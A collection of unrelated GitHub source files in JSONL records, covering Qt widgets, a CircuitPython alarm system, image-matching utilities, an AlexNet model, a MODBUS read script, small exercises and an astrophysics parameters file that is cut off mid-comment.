headers=self.headers)\n result = json.loads(resp.data)\n self.assertIn('depositList', result)\n","repo_name":"KyberNetwork/exchange-simulator","sub_path":"tests/test_binance_api.py","file_name":"test_binance_api.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"72"} +{"seq_id":"6864459577","text":"from PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QAction, QActionGroup, QMenu\n\nimport parce.registry\n\n\n\nclass LanguageMenuAction(QAction):\n \"\"\"A QAction that shows a section-based submenu for all languages in the/a\n parce :class:`~parce.registry.Registry`.\n\n \"\"\"\n lexicon_changed = pyqtSignal(object)\n \"\"\"This signal is emitted when a language is selected by the user.\n\n The single argument is a :class:`~parce.lexicon.Lexicon` or None.\n\n \"\"\"\n\n def __init__(self, parent=None, registry=None):\n super().__init__(parent)\n self._registry = None\n self._actionGroup = QActionGroup(self, triggered=self._slot_language_selected)\n self.setMenu(QMenu(\"\", None))\n self.set_registry(registry or parce.registry.registry)\n\n def set_registry(self, registry):\n \"\"\"Set the :class:`~parce.registry.Registry` and populate ourselves\n with the lexicons from the registry.\n\n \"\"\"\n self._registry = registry\n self._populate()\n\n def registry(self):\n \"\"\"Return the currently set Registry.\"\"\"\n return self._registry\n\n def display_name(self, qualname):\n \"\"\"Return the text to display for the ``qualname``.\n\n By default the desc and the name between parentheses from the\n registry's entry is returned. If the qualname is None or the empty\n string, returns ``\"None\"``.\n\n \"\"\"\n if qualname:\n entry = self.registry()[qualname]\n return \"{0.desc} ({0.name})\".format(entry)\n return \"None\"\n\n def set_lexicon(self, lexicon):\n \"\"\"Set the current lexicon, or None.\"\"\"\n for a in self._actionGroup.findChildren(QAction):\n if ((lexicon and a.objectName() == lexicon.qualname) or\n (not lexicon and not a.objectName())):\n a.setChecked(True)\n return\n a = self._actionGroup.checkedAction()\n if a:\n a.setChecked(False)\n\n def lexicon(self):\n \"\"\"Return the current lexicon.\"\"\"\n a = self._actionGroup.checkedAction()\n if a:\n qualname = a.objectName()\n if qualname:\n r = self.registry()\n return r.lexicon(qualname)\n\n def _slot_language_selected(self, action):\n \"\"\"Called when an action is triggered.\"\"\"\n qualname = action.objectName()\n lexicon = self.registry().lexicon(qualname) if qualname else None\n self.lexicon_changed.emit(lexicon)\n\n def _populate(self):\n \"\"\"Called to fill ourselves with submenus from the registry.\"\"\"\n g = self._actionGroup\n m = self.menu()\n for a in g.findChildren(QAction):\n a.setParent(None)\n a.deleteLater()\n actions = m.actions()\n insert_before = None\n if not actions:\n # menu is empty\n a = QAction(g, text=\"&None\", objectName=\"\", checkable=True, checked=True)\n m.addAction(a)\n m.addSeparator()\n else:\n # make it empty\n for index, a in enumerate(actions):\n if a.objectName() == \"sect_submenu\":\n insert_before = a\n break\n else:\n if len(actions) > 2:\n insert_before = actions[2]\n reg = self.registry().by_section()\n for sect in sorted(reg):\n if sect:\n submenu = QMenu()\n a = QAction(sect, m, objectName=\"sect_submenu\")\n a.setMenu(submenu)\n m.insertAction(insert_before, a) if insert_before else m.addAction(a)\n entries = sorted((self.display_name(qualname), qualname) for qualname in reg[sect].keys())\n for name, qualname in entries:\n submenu.addAction(QAction(g, text=name, objectName=qualname, checkable=True))\n # old items left?\n if actions and index:\n for a in actions[index:]:\n if a.objectName() == \"sect_submenu\":\n a.setParent(None)\n a.deleteLater()\n\n","repo_name":"wbsoft/parceqt","sub_path":"parceqt/gadgets/languagemenuaction.py","file_name":"languagemenuaction.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33042630446","text":"#remember to add status\nimport time\nimport board\nimport neopixel\nimport random\nimport digitalio as dio\nimport adafruit_hcsr04\n\n#Mario defined the variables and inputs/outputs\nnum_pixels = 30\nnp = neopixel.NeoPixel(board.D2, num_pixels, auto_write = False, brightness = 1)\n\nDISARMED = 0\nARMED = 1\nARMING = 2\n\npir = dio.DigitalInOut(board.D3)\npir.direction = dio.Direction.INPUT\n\nsonar = adafruit_hcsr04.HCSR04(trigger_pin=board.D4, echo_pin=board.D5)\n\nbb = dio.DigitalInOut(board.D6)\nbb.direction = dio.Direction.INPUT\nbb.pull = dio.Pull.UP\n\nbutton = dio.DigitalInOut(board.D7)\nbutton.direction = dio.Direction.INPUT\narm = button\n\nbutton2 = dio.DigitalInOut(board.D8)\nbutton2.direction = dio.Direction.INPUT\ndisarm = button2\n\nred = (255, 0, 0)\nblack = (0,0,0)\nwhite = (255,255,255)\nblue = (0,0,255)\ngreen = (0,255,0)\npurple = (255,0,255)\nyellow = (255, 100, 0)\norangeT = (255, 80, 0)\norange = (255, 64, 0)\nlightBlue = (87, 232, 255)\nlightpurple = (227, 98, 255)\ndarkpurple = (18,0,18)\ndefaultcolor = [216, 231, 0]\nstatus = DISARMED\n#Mario defined the variables and inputs/outputs\n\n#Yency did the Functions\n'''\nFunction: fade_out\n\nDescription: This function begins with a color and fades to black\n\nParameters: defcolor(list), delay(float)\n\nReturn value: Prints the color values as they update\n'''\ndef fade_out(defaultcolor, delay = 0.005):\n fadeR = defaultcolor[0]/256.0\n fadeG = defaultcolor[1]/256.0\n fadeB = defaultcolor[2]/256.0\n for i in range(256):\n color1[0] = int (defaultcolor[0] - (fadeR*i))\n color1[1] = int (defaultcolor[1] - (fadeG*i))\n color1[2] = int (defaultcolor[2] - (fadeB*i))\n np.fill(color1)\n print(i, defaultcolor,fadeR*i,fadeG*i,fadeB*i)\n time.sleep(delay)\n np.show()\n\n'''\nFunction: fade_in\n\nDescription: This function begins with a black and fades in to a color\n\nParameters: defcolor(list), delay(float)\n\nReturn value: Prints the color values as they update\n'''\ndef fade_in(defaultcolor, delay = 0.005):\n fadeR = defaultcolor[0]/256.0\n fadeG = defaultcolor[1]/256.0\n fadeB = defaultcolor[2]/256.0\n for i in range(256):\n color1[0] = int (fadeR*i)\n color1[1] = int (fadeG*i)\n color1[2] = int (fadeB*i)\n np.fill(color1)\n print(i, defaultcolor,fadeR*i,fadeG*i,fadeB*i)\n time.sleep(delay)\n np.show()\n\ncolor1 = [defaultcolor[0],defaultcolor[1],defaultcolor[2]]\nnp.fill(color1)\n\n'''\nFunction: disarmed\n\nDescription: This function changes the LED color to green to show the system is disarmed.\n\n\nReturn value: np.show()\n'''\ndef disarmed():\n np.fill(green)\n np.show()\n'''\nFunction: arming\n\nDescription: This function changes the LED color to yellow to show the system is arming.\n\n\nReturn value: np.show() & print(status)\n'''\ndef arming():\n np.fill(yellow)\n np.show()\n status = ARMING\n print(status)\n time.sleep(10)\n '''\nFunction: armed\n\nDescription: This function changes the LED color to red to show the system is armed.\n\n\nReturn value: np.show()\n'''\ndef armed():\n np.fill(red)\n np.show()\n#Yency did the Functions\n\n#Jaidyn created the base code, the entire group extened the code=\nwhile True:\n if disarm.value != True:\n disarmed()\n status = DISARMED\n print(status)\n print(arm.value)\n\n if arm.value != True:\n arming()\n armed()\n status = ARMED\n print(status)\n\n if status == 1 and not bb.value:\n print(\"Beam is broken!, Triggering!\")\n for i in range(30):\n fade_out(red)\n fade_in(red)\n armed()\n\n elif status == 1 and pir.value:\n print(\"Motion Detected, Triggering!\")\n for i in range(10):\n fade_out(red)\n fade_in(red)\n armed()\n \n try:\n if status == 1 and sonar.distance <= 150:\n print(\"Triggered!\")\n for i in range(10):\n fade_out(red)\n fade_in(red)\n armed()\n\n except RuntimeError:\n armed()\n#Jaidyn created the base code, the entire group extened the code\n","repo_name":"FCHS-CS/YMJ","sub_path":"Security Project.py","file_name":"Security Project.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70273328554","text":"'''\n Melhore o jogo do desafio 28 onde o computador vai 'pensar' em um numero de 0 a 10\n onde o jogador vai chutando valores e quando acertar mostre a quantidade de chutes\n'''\nfrom math import e\nimport random\n\nprint('= ' * 6 + '' + ' =' * 6)\n\nnumero_chutes = 0\ntentativa = True\nnumero = random.randrange(0, 11)\nwhile tentativa:\n chute = int(input('Chute um número de 0 a 10: '))\n if numero == chute:\n print('ACERTOU!!!')\n tentativa = False\n else:\n numero_chutes += 1\n print('ERROU')\n\nprint('= ' * 15)","repo_name":"LuccaSantos/curso-em-video-python3","sub_path":"Desafios/modulo02/def58.py","file_name":"def58.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74824727272","text":"from pathlib import Path\nimport torch\nimport cv2\nimport numpy as np\nimport math\nfrom typing import Union, List, Optional\n# import skimage.metrics as metrics\n\n\ndef read_image(path: Path, grayscale: bool = False) -> np.ndarray:\n \"\"\"Read an image from path as RGB or grayscale\"\"\"\n mode = cv2.IMREAD_GRAYSCALE if grayscale else cv2.IMREAD_COLOR\n image = cv2.imread(str(path), mode)\n if image is None:\n raise IOError(f'Could not read image at {path}.')\n if not grayscale:\n image = image[..., ::-1]\n return image\n\n\ndef numpy_image_to_torch(image: np.ndarray) -> torch.Tensor:\n \"\"\"Normalize the image tensor and reorder the dimensions.\"\"\"\n if image.ndim == 3:\n image = image.transpose((2, 0, 1)) # HxWxC to CxHxW\n elif image.ndim == 2:\n image = image[None] # add channel axis\n else:\n raise ValueError(f'Not an image: {image.shape}')\n return torch.tensor(image / 255., dtype=torch.float)\n\n\ndef resize_image(image: np.ndarray, size: Union[List[int], int],\n fn: str, interp: Optional[str] = 'area') -> np.ndarray:\n \"\"\"Resize an image to a fixed size, or according to max or min edge.\"\"\"\n h, w = image.shape[:2]\n\n fn = {'max': max, 'min': min}[fn]\n if isinstance(size, int):\n scale = size / fn(h, w)\n h_new, w_new = int(round(h*scale)), int(round(w*scale))\n scale = (w_new / w, h_new / h)\n elif isinstance(size, (tuple, list)):\n h_new, w_new = size\n scale = (w_new / w, h_new / h)\n else:\n raise ValueError(f'Incorrect new size: {size}')\n mode = {\n 'linear': cv2.INTER_LINEAR,\n 'cubic': cv2.INTER_CUBIC,\n 'nearest': cv2.INTER_NEAREST,\n 'area': cv2.INTER_AREA}[interp]\n return cv2.resize(image, (w_new, h_new), interpolation=mode), scale\n\n\ndef load_image(path: Path, grayscale: bool = False, resize: int = None,\n fn: str = 'max', interp: str = 'area') -> torch.Tensor:\n img = read_image(path, grayscale=grayscale)\n scales = [1, 1]\n if resize is not None:\n img, scales = resize_image(img, resize, fn=fn, interp=interp)\n return numpy_image_to_torch(img), torch.Tensor(scales)\n\n\ndef match_pair(extractor, matcher, image0, image1, scales0=None, scales1=None):\n device = image0.device\n data = {'image0': image0[None].cuda(), 'image1': image1[None].cuda()}\n img0, img1 = data['image0'], data['image1']\n feats0, feats1 = extractor({'image': img0}), extractor({'image': img1})\n pred = {**{k+'0': v for k, v in feats0.items()},\n **{k+'1': v for k, v in feats1.items()},\n **data}\n pred = {**pred, **matcher(pred)}\n pred = {k: v.to(device).detach()[0] if\n isinstance(v, torch.Tensor) else v for k, v in pred.items()}\n if scales0 is not None:\n pred['keypoints0'] = (pred['keypoints0'] + 0.5) / scales0[None] - 0.5\n if scales1 is not None:\n pred['keypoints1'] = (pred['keypoints1'] + 0.5) / scales1[None] - 0.5\n del feats0, feats1\n torch.cuda.empty_cache()\n\n # create match indices\n kpts0, kpts1 = pred['keypoints0'], pred['keypoints1']\n matches0, mscores0 = pred['matches0'], pred['matching_scores0']\n valid = matches0 > -1\n matches = torch.stack([torch.where(valid)[0], matches0[valid]], -1)\n # m_kpts0, m_kpts1 = pred['keypoints0'][matches[..., 0]], pred['keypoints1'][matches[..., 1]]\n return {**pred, 'matches': matches, 'matching_scores': mscores0[valid]}\n\ndef transformation(pt_drone, H):\n return H @ pt_drone\n\ndef coords(mat):\n a = mat[0][0]/mat[2][0]\n b = mat[1][0]/mat[2][0]\n return float(a), float(b)\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-1 * x))\n\n# def ssim_similarity(imgA, imgB):\n# return metrics.structural_similarity(imgA, imgB, channel_axis = 1)\n\ndef draw_matches(img_A, img_B, keypoints0, keypoints1):\n \n p1s = []\n p2s = []\n dmatches = []\n for i, (x1, y1) in enumerate(keypoints0):\n\n p1s.append(cv2.KeyPoint(x1, y1, 1))\n p2s.append(cv2.KeyPoint(keypoints1[i][0], keypoints1[i][1], 1))\n j = len(p1s) - 1\n dmatches.append(cv2.DMatch(j, j, 1))\n\n matched_images = cv2.drawMatches(cv2.cvtColor(img_A, cv2.COLOR_RGB2BGR), p1s,\n cv2.cvtColor(img_B, cv2.COLOR_RGB2BGR), p2s, dmatches, None)\n\n return matched_images\n\ndef rotate(image, angle, center=None, scale=1.0): #逆时针旋转\n (h, w) = image.shape[:2] #2\n if center is None: #3\n center = (w // 2, h // 2) #4\n \n M = cv2.getRotationMatrix2D(center, angle, scale) #5\n \n rotated = cv2.warpAffine(image, M, (w, h)) #6\n return rotated #7\n\ndef rotateP(angle,valuex,valuey,pointx,pointy):\n valuex = np.array(valuex)\n valuey = np.array(valuey)\n sRotatex = (valuex-pointx)*math.cos(angle) + (valuey-pointy)*math.sin(angle) + pointx\n sRotatey = (valuey-pointy)*math.cos(angle) - (valuex-pointx)*math.sin(angle) + pointy\n return sRotatex,sRotatey\n\ndef getR(score):\n x = score\n R = 4\n r = R * math.exp(-1 * math.pi * R**2 * x**2)\n return math.ceil(r)\n\ndef byte2tensor(image):\n decoded_image = cv2.imdecode(np.frombuffer(image, dtype=np.uint8),\n cv2.IMREAD_COLOR)\n return numpy_image_to_torch(decoded_image)","repo_name":"LuoXubo/UAV-tracking","sub_path":"lightglue/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73090098473","text":"from src.machinelearningsuite.machinelearningsuite import MachineLearningSuite\n\n\nif __name__ == \"__main__\":\n # suite = MachineLearningSuite(\"../videos/trump.mp4\", \"../data/shape_predictor_68_face_landmarks.dat\")\n suite = MachineLearningSuite(\"webcam\", \"./data/shape_predictor_68_face_landmarks.dat\")\n suite.initialize()\n\n print(suite.configuration.to_dict())\n\n while True:\n print(\"MENU\")\n print(\"=====\")\n print(\"1. Create classes\")\n print(\"2. Select the parts of the face to train on\")\n print(\"3. Train\")\n print(\"4. Predict\")\n print(\"5. Reset configuration\")\n print(\"6. Exit\")\n choice = input(\"What do you want to do?\")\n\n if choice == \"1\":\n suite.create_classes()\n elif choice == \"2\":\n suite.select_parts()\n elif choice == \"3\":\n suite.train()\n elif choice == \"4\":\n suite.predict()\n elif choice == \"5\":\n suite.configuration.reset()\n elif choice == \"6\":\n suite.quit()\n else:\n print(\"Wrong choice\")\n continue\n","repo_name":"bhanssens/student-trip-lyon","sub_path":"examples/machinelearningsuiteapp.py","file_name":"machinelearningsuiteapp.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39144195869","text":"from Cell import *\nimport copy\nfrom oneCandidate import *\nfrom lockedCandidate import *\n\nclass Solver(object):\n def __init__(self):\n self._cells = []\n\n def solve(self,array):\n self._copyArray(array)\n self._notSolvedArrayInit()\n self.__oneCandidate = OneCandidate(array)\n self.__lockedCandidate = LockedCandidate(array)\n status = True\n while status:\n self._array, foundStatus1 = self.__oneCandidate.process(self._cells, self._array)\n if self._cells: self._array,foundStatus2 = self.__lockedCandidate.process(self._cells, self._array)\n else : break\n \n if not (foundStatus1 or foundStatus2): break\n\n return self._array\n\n def _copyArray(self,array):\n if len(array) != 9:\n error('Macierz ma za mało rzędów!')\n for i in range(len(array)):\n if len(array[i]) != 9:\n error('Macierz ma za mało kolumn w rzędzie:', i)\n \n self._array = array\n\n def _notSolvedArrayInit(self):\n self._notSolvedIndex = []\n for r in range(len(self._array)):\n for c in range(len(self._array[r])):\n if not self._array[r][c]:\n self._cells.append(Cell(r,c))\n\n \n \n def __str__(self):\n out = ''\n for row in self._array:\n out += str(row)+ '\\n'\n return out","repo_name":"igorpieniek/tkinter_solver","sub_path":"sudoku_solver/Solver.py","file_name":"Solver.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74662593833","text":"import tensorflow as tf\nimport numpy as np\n\nfrom layers import conv, lrn, max_pool, fc\n\n\nclass VS_CNN(object):\n\n def __init__(self, num_classes, skip_layers=None, finetune_layers=None, weights_path='weights/bvlc_alexnet.npy'):\n # TF placeholder for graph input and output\n self.x = tf.placeholder(tf.float32, [None, 227, 227, 3])\n self.y = tf.placeholder(tf.float32, [None, 2])\n self.keep_prob = tf.placeholder(tf.float32)\n\n self.num_classes = num_classes\n self.skip_layers = skip_layers\n self.finetune_layers = finetune_layers\n self.weights_path = weights_path\n\n # Call the create function to build the computational graph of AlexNet\n self.build()\n\n def build(self):\n \"\"\"Create the network graph.\"\"\"\n # 1st Layer: Conv (w ReLu) -> Lrn -> Pool\n conv1 = conv(self.x, 11, 11, 96, 4, 4, padding='VALID', name='conv1')\n norm1 = lrn(conv1, 2, 1e-05, 0.75, name='norm1')\n pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1')\n\n # 2nd Layer: Conv (w ReLu) -> Lrn -> Pool with 2 groups\n conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2')\n norm2 = lrn(conv2, 2, 1e-05, 0.75, name='norm2')\n pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2')\n\n # 3rd Layer: Conv (w ReLu)\n conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3')\n\n # 4th Layer: Conv (w ReLu) splitted into two groups\n conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4')\n\n # 5th Layer: Conv (w ReLu) -> Pool splitted into two groups\n conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5')\n pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5')\n\n # 6th Layer: Flatten -> FC (w ReLu) -> Dropout\n flattened = tf.reshape(pool5, [-1, 6 * 6 * 256])\n fc6 = fc(flattened, 6 * 6 * 256, 4096, name='fc6')\n\n # 7th Layer: FC (w ReLu) -> Dropout\n fc7 = fc(fc6, 4096, 4096, name='fc7')\n\n # 8th Layer: FC and return unscaled activations\n self.fc8 = fc(fc7, 4096, self.num_classes, relu=False, name='fc8')\n\n def load_initial_weights(self, session):\n weights_dict = dict(np.load(self.weights_path, encoding='bytes').item())\n\n # Loop over all layer names stored in the weights dict\n for op_name in weights_dict.keys():\n # Check if layer should be trained from scratch\n if op_name not in self.skip_layers:\n\n trainable = False\n if op_name in self.finetune_layers:\n trainable = True\n\n with tf.variable_scope(op_name, reuse=True):\n # Assign weights/biases to their corresponding tf variable\n for data in weights_dict[op_name]:\n if len(data.shape) == 1: # Biases\n var = tf.get_variable('biases', trainable=trainable)\n session.run(var.assign(data))\n else: # Weights\n var = tf.get_variable('weights', trainable=trainable)\n session.run(var.assign(data))\n","repo_name":"PreferredAI/tutorials","sub_path":"image-classification/vs-cnn/src/model_base.py","file_name":"model_base.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"72"} +{"seq_id":"26390583158","text":"import requests\n\ninverter_address = 'http://192.168.1.31:502'\n\ndef Send_request_to_device(address, request):\n response = requests.post(address, request)\n return response\n\n\n# Will read 122 registers starting at address 40001\n# Tx: 01 03 9C 40 00 7A EB AD\n# byte[0] = Unit id to send request to\n# byte[1] = The function to perform 3 = read holding registers\n# byte[2:3] = The register address to start reading (40001)\n# byte[4] = The register amoutn / size of data\n# register 40000 will have least significant bytes\n# register 40001 will have most significant bytes\n\n# Rx: 01 03 9C 40 00 XX XX\n# byte[0] = Unit id to send request to\n# byte[1] = The function to perform 3 = read holding registers\n# byte[2:3] = The register address to read (40001)\n# byte[4:7] = The register data\n# byte[4:5] = Least significant bytes\n# byte[6:7] = Most significant bytes\ndef Read_device_register(self, device_address):\n read_register_request = bytes.fromhex('01 03 9C 40 00 02')\n response = self.Send_request(device_address, read_register_request)\n print(response)\n\n\nRead_device_register(inverter_address)","repo_name":"billyParmenter/MODBUS_Request","sub_path":"MODBUS_Request.py","file_name":"MODBUS_Request.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3434758090","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n # get max sell-off price from future going backwards\n # compute max last transaction profits from this running through backwards\n # So far linear\n # Then we can run backwards one last time keeping track of future value and future profit\n \n profit = [0] * len(prices)\n \n max_future_price = prices[-1]\n max_future_profit = 0\n for i in range(len(prices)-2, -1, -1):\n max_future_price = max(max_future_price, prices[i+1])\n max_future_profit = max(max_future_profit, max_future_price - prices[i])\n profit[i] = max_future_profit\n \n min_past_price = prices[0]\n for i in range(len(prices)):\n min_past_price = min(min_past_price, prices[i])\n profit[i] += prices[i] - min_past_price\n\n return max(profit)\n \n \n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0123/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27002418366","text":"from matplotlib import pyplot as plot\r\n\r\nprint(\"Data of the population of top 5 countries of the world\")\r\nprint(\"\\nData taken from U.S. Census Bureau Current Population\")\r\nprint(\"\\nCreated for MLH daily task by a noob\")\r\n\r\n\r\na, b, c = [1,2,3,4], [2,4,6,8], [1,4,9,16]\r\n\r\nplot.xlabel('Countries')\r\nplot.ylabel('Population')\r\ncountries = ['China', 'India', 'USA', 'Indonesia', 'Pakistan']\r\npopu = [1394015977, 1325349639, 329877505, 272856400, 233431156]\r\nplot.bar(countries,popu,width = 0.7, color = ['green', 'red', 'blue', 'yellow', 'violet', 'orange'])\r\nplot.title(\"POPULOUS COUNTRIES (July 1, 2020)\")\r\nplot.show()","repo_name":"pawanbgs0/MLH-local-hack-day","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7471858979","text":"# coding=utf-8\n\n#-----------------------------------------------------------\n# Parameters that can tuned for running CLOUDY models individually for each star particle. \n# There is an option to include nebular emission fro Young stars, post-AGB stars, Diffuse Ionized Gas and AGNs.\n# These only work when add_nebular_emission is set to true and use_cloudy_tables is set to false in parameters_master.py\n#-----------------------------------------------------------\n\n#===============================================\n# Sub Resolution Modeling \n#===============================================\nuse_cmdf = False # If True, star particles that have mass greater than cmdf_mas_mass (defined below) are broken down using a \n # cluster mass distribution function (cmdf) of the form dN/dM goes as M^(beta). This works irrespecitve of whether\n # nebular emission is turned on or not. The cmdf is set by the following parameters defined below: \n # cmdf_min_mass, cmdf_max_mass, cmdf_bins and cmdf_beta.\n\ncmdf_min_mass = 3.5 # Minimum mass of the star clusters in units of log(Msun). Note: Results might be inconsistent if\n # set lower than 3.5. (See Chandar et al.2014 for more info) (Default = 3.5)\n\ncmdf_max_mass = 5.0 # Maximum mass of the star clusters in units of log(Msun). (Default = 5.0). Note: Only star particles that\n # have a mass greater than this parameter are broken down. \n\ncmdf_bins = 6 # The number of bins used for calulating the cluster mass distribution function (Default = 6.0)\n\ncmdf_beta = -2.0 # Beta (power law exponent) for calculating CMDF (dN/dM goes as M^(beta)) \n\nuse_age_distribution = False # Setting this to True, divides the star particles with ages between age_dist_min and age_dist_max (next parameters) into \n # an ensemble of particles all of whom have the same properties except their age which is picked from a power law age \n # distribution of the form dN/dt is proportional to t^-0.65 (Imp: This can only be used if use_cmdf is also set to True). \n # Note: The function has a bunch of tunable parameters that can be changed though we feel that their default values\n # should be good enough for most cases. The function is located in cloudy_tools.py file under powderday/nebular_emission. \n\nage_dist_min = 3e-3 # Star particle above this age are sub-divided into an age distribution if use_age_distribution is set to True\n # (Units: Gyr, Default = 3.e-3)\n\nage_dist_max = 1e-2 # Star particles below this age are sub-divided into an age distribution if use_age_distribution is set to True\n # (Units: Gyr, Default = 1.e-2)\n \n#***********************\n# COMMON PARAMETERS\n#***********************\n# NOTE: These parmeters take either three or four values as an input. \n# They correspond to the value of the pararmeter for young_stars, PAGB stars, AGN and DIG respectively.\n\nFORCE_gas_logu = [False, False, False] \t # If set, then we force the ionization parameter (gas_logu) to be \n \t\t\t # gas_logu (next parameter) else, it is taken to be variable and dependent on ionizing \n \t\t\t # radiation from star particles. (Default: [False, False, False])\n\ngas_logu = [-2.0, -2.0, -2.0] \t\t# Gas ionization parameter. This is only relevant \n \t\t\t # if add_neb_emission is set to True and FORCE_gas_logu is set to True (Default: [-2.0, -2.0, -2.0])\n\ngas_logu_init = [0.0, 0.0, 0.0] \t # Force the ionization parameter to increase/decrease by this value (Scale: log). \n \t\t \t# Useful if you want to run tests (Default: [0.0, 0.0, 0.0])\n\nFORCE_gas_logz = [False, False, False] # If set, then we force the metallicity (gas_logz) to be gas_logz (next parameter)\n \t # else, it is taken to be the star particles metallicity. (Default: [False, False, False])\n\ngas_logz = [0.0, 0.0, 0.0] \t\t\t # Metallicity of the HII region in units of log(Z/Z_sun)\n \t\t\t # only relevant if add_neb_emission = True and FORCE_gas_logz = True (Default: [0.0, 0.0, 0.0])\n\nFORCE_logq = [False, False, False] \t# If set, then we force the number of ionizing photons to be source_logq (next parameter)\n # else, it is taken to be variable and dependent on ionizing radiation of the source. (Default: [False, False, False])\n\nsource_logq = [1.e47, 1.e47,1.e47] # The number of ionizing photons emitted by the source in units of s^-1. Only relevant if add_neb_emission = True, \n \t\t\t\t\t\t\t\t\t\t# use_cloudy_tables = True and FORCE_gas_logq = True (Default: [1.e47,1.e47,1.e47]) \n \nFORCE_inner_radius = [False, False, True] # If set, then we force the inner radius of the cloud to be inner_radius (next parameter). \n\t\t\t\t\t\t\t\t\t\t\t# IMP Note: This works only for young stars and Post-AGB stars. \n \t\t\t\t\t\t\t\t\t\t# For AGN we keep the inner radius fixed at whatever is set by inner_radius (next parameter) \n \t\t\t\t\t\t\t\t\t\t# irrespective of what this parameter is set to. (Default: [False,False,True])\n\ninner_radius = [1.e19, 1.e19, 2.777e+20] \t# This sets the inner radius of the cloud in cm. This is used only when add_neb_emission = True,\n \t\t \t# use_cloudy_tables = False and FORCE_inner_radius = True (Default: [1.e19, 1.e19, 2.777e+20], Units = cm)\n\nFORCE_N_O_Pilyugin = [False, False, False, False] # If set to True, Nitrogen abundances are set according to the N/O vs O/H relation from Pilyugin et al. 2012\n # If FORCE_N_O ratio (next parameter) is set to True then this parameter is ignored.(Default: [False,False,False, False])\n\nFORCE_N_O_ratio = [False, False, False, False] # If set, then we force the Nitrogen abundance such that the log of N/O ratio is N_O_ratio (next parameter). \n \t\t\t # This can be used as a template fix adundance ratio of other elements (Default: [False, False, False])\n\nN_O_ratio = [-0.85, -0.85, -0.85, -0.85] # This sets the log of N/O ratio. This is used only when add_neb_emission = True,\n \t\t\t # use_cloudy_tables = False, FORCE_N/O ratio = True and neb_abund = \"direct\" (Default: = [-0.85, -0.85, -0.85])\n\nneb_abund = [\"dopita\", \"dopita\", \"dopita\", \"dopita\"] # This sets the HII region elemental abundances for generating CLOUDY models. \n \t\t\t # Available abundaces are.\n \t\t\t # dopita: Abundances from Dopita (2001) with old solar abundances = 0.019 and ISM grains.\n \t\t\t # newdopita: Abundances from Dopita (2013). Solar Abundances from Grevasse 2010 - z= 0.013\n \t\t\t # includes smooth polynomial for N/O, C/O relationship functional form for He(z),\n \t\t\t # new depletion and factors in ISM grains.\n \t\t\t # gutkin: Abundabces from Gutkin (2016) and PARSEC metallicity (Bressan+2012) based on Grevesse+Sauvel (1998) \n \t\t\t # and Caffau+2011 \n \t\t\t # direct: Abundances are taken directly from the simulation if possible. Defaults to using \"dopita\" if there is \n \t\t\t # an error. (Note: Works only for AGNs and star particles that are added directly without binning.\n \t\t\t # Make sure to set FORCE_BINNED to False)\n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False. (Default: [\"dopita\", \"dopita\", \"dopita\"])\n#***************************\n# YOUNG STARS (HII regions)\n#***************************\n\nadd_young_stars = True \t\t\t # If set, the young stars are included when calculating nebular emission (Default: True)\n\n\nHII_Rinner_per_Rs = 0.01 \t\t # Rinner for cloudy calculations is set to this value times the Stromgen Radius. \n \t\t\t # For example, if set to 0.01 Rinner is taken to be 1 % of Stromgren Radius. \n \t\t \t# If FORCE_inner_radius (next parameter) is set to True then this is overridden\n \t\t\t # and the value set by the inner_radius is used. This parameter is used \n \t\t\t # only when add_neb_emission = True and use_cloudy_tables = False (Default: 0.01)\n \nHII_nh = 1.e2 \t\t\t # Gas hydrogen density for calcualting nebular emission in units if cm^-3. \n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e2)\n\nHII_min_age = 1.e-3 # Sets the minimum age limit for calculating nebular emission in units of Gyr. \n # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e-3)\n\nHII_max_age = 1.e-2 \t\t\t # Sets the maximum age limit for calculating nebular emission in units of Gyr. \n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 1.e-2)\n\nHII_escape_fraction = 0.0 \t\t\t # Fraction of H-ionizaing photons that escape the HII region. \n \t\t\t # This is used only when add_neb_emission = True and use_cloudy_tables = False (Default = 0.0)\n\nHII_dust = False # If set, then dust grains are included in the CLOUDY model. We use grains orion command to add\n # dust grains which specifies graphitic and silicate grains with a size distribution and 